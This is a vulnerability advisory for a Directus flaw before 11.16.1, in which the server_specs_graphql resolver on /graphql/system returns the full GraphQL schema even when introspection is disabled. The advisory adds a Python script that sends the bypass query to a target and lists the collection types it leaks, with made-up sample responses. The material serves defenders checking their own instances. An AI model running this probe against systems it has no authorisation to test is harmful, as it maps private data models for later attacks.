Impact
Directus is a real-time API and dashboard for managing SQL databases. Releases earlier than 11.16.1 contain a logic error that lets an attacker bypass the GRAPHQL_INTROSPECTION setting. Setting GRAPHQL_INTROSPECTION to false blocks standard introspection queries (the __schema and __type meta-fields), but the server_specs_graphql resolver, exposed on the /graphql/system endpoint, still returns the full SDL representation of the GraphQL schema. The SDL reveals collection names, field names, types and relationships: to unauthenticated users at the public permission level and to authenticated users at their permitted level. This is an information disclosure that can assist in further attacks; it does not expose stored data by itself.
Affected Systems
Any Directus installation running a version earlier than 11.16.1 with GRAPHQL_INTROSPECTION set to false is affected (installations that leave introspection enabled already expose the schema by design, so the bypass changes nothing for them). The flaw lives in the component that serves the /graphql/system endpoint and affects all deployments that expose the GraphQL API. Both unauthenticated visitors and users with GraphQL permissions can trigger the disclosure; what each sees is bounded by the permissions their role holds.
Risk and Exploitability
The CVSS score of 5.3 reflects moderate severity. An EPSS score below 1 % indicates a low estimated probability of exploitation in the wild, and the vulnerability is not included in the CISA KEV catalog. Exploitation is nonetheless straightforward: an attacker with network access to the instance's /graphql/system endpoint retrieves the schema with a single GraphQL query to server_specs_graphql, with no special tooling and, at the public permission level, no credentials. Because the data disclosed is the schema's structure rather than actual content, the immediate confidentiality impact is limited, but it lets an attacker map the internal data model (which collections exist, which fields look sensitive, how collections relate) and plan subsequent attacks such as injection or privilege escalation. Upgrading to 11.16.1 or later removes the bypass; until then, treat GRAPHQL_INTROSPECTION=false as a hardening setting rather than a security boundary, and restrict network access to /graphql/system where the schema must stay private.
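The following is an added example, not code from Directus or from the advisory, that a practitioner could use to confirm whether an instance leaks its schema through server_specs_graphql while standard introspection is blocked. It assumes the Directus GraphQL query `server_specs_graphql(scope: items|system)` returns the SDL as a string under `data.server_specs_graphql`, and that a refused `__schema` query comes back with an `errors` list or without `data.__schema`; both are assumptions about the server, and the sample responses and error text below are constructed. The `post_graphql` helper performs the live check against a hypothetical base URL and is not exercised offline.

```python
"""Check for the Directus server_specs_graphql introspection bypass (added example)."""
import json
import re
from typing import Dict, List, Optional
import urllib.request

# Standard introspection probe: should be refused when GRAPHQL_INTROSPECTION=false.
INTROSPECTION_QUERY = "{ __schema { queryType { name } } }"


def build_sdl_probe(scope: str = "items") -> bytes:
    """The bypass: ask the server_specs_graphql resolver for the SDL directly.
    `scope` accepting `items` or `system` is an assumption about the Directus schema."""
    if scope not in ("items", "system"):
        raise ValueError("scope must be 'items' or 'system'")
    return json.dumps({"query": f"{{ server_specs_graphql(scope: {scope}) }}"}).encode()


# One GraphQL object type per collection, so type names map back to collection names.
TYPE_RE = re.compile(r"^\s*type\s+([A-Za-z_][A-Za-z0-9_]*)", re.MULTILINE)


def types_in_sdl(sdl: str) -> List[str]:
    """Return the object type names declared in an SDL document."""
    return TYPE_RE.findall(sdl)


def classify(introspection_resp: Dict, sdl_resp: Dict) -> Dict:
    """Vulnerable means: introspection is blocked, yet the SDL probe still returns types."""
    schema = (introspection_resp.get("data") or {}).get("__schema")
    introspection_blocked = bool(introspection_resp.get("errors")) or not schema
    sdl = (sdl_resp.get("data") or {}).get("server_specs_graphql")
    leaked = types_in_sdl(sdl) if isinstance(sdl, str) else []
    return {
        "introspection_blocked": introspection_blocked,
        "sdl_returned": bool(leaked),
        "vulnerable": introspection_blocked and bool(leaked),
        "types": leaked,
    }


def post_graphql(base_url: str, body: bytes, token: Optional[str] = None,
                 timeout: float = 10) -> Dict:
    """Live version of the check against /graphql/system; base_url is hypothetical."""
    req = urllib.request.Request(base_url.rstrip("/") + "/graphql/system", data=body,
                                 headers={"Content-Type": "application/json"})
    if token:  # authenticated probe shows what a given role can see
        req.add_header("Authorization", f"Bearer {token}")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


# Constructed sample responses modelling a vulnerable instance (not real Directus output).
SAMPLE_INTROSPECTION_RESP = {"errors": [{"message": "introspection disabled (constructed)"}]}
SAMPLE_SDL_RESP = {"data": {"server_specs_graphql":
    "type Query {\n  articles: [articles!]\n  customers: [customers!]\n}\n"
    "type articles {\n  id: ID!\n  title: String\n  author: customers\n}\n"
    "type customers {\n  id: ID!\n  email: String\n  ssn: String\n}\n"}}

if __name__ == "__main__":
    # Offline run over the constructed samples; swap in post_graphql(...) for a live target.
    print(json.dumps(classify(SAMPLE_INTROSPECTION_RESP, SAMPLE_SDL_RESP), indent=2))
```

Run the two probes with the same credentials (or none) so the comparison is fair: an instance that refuses `__schema` but hands back type names from `server_specs_graphql` is exhibiting the bypass, and the recovered type list is exactly the collection map the advisory describes. After upgrading, repeat the check; the SDL probe should no longer return the schema when introspection is disabled.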
OpenCVE Enrichment
Github GHSA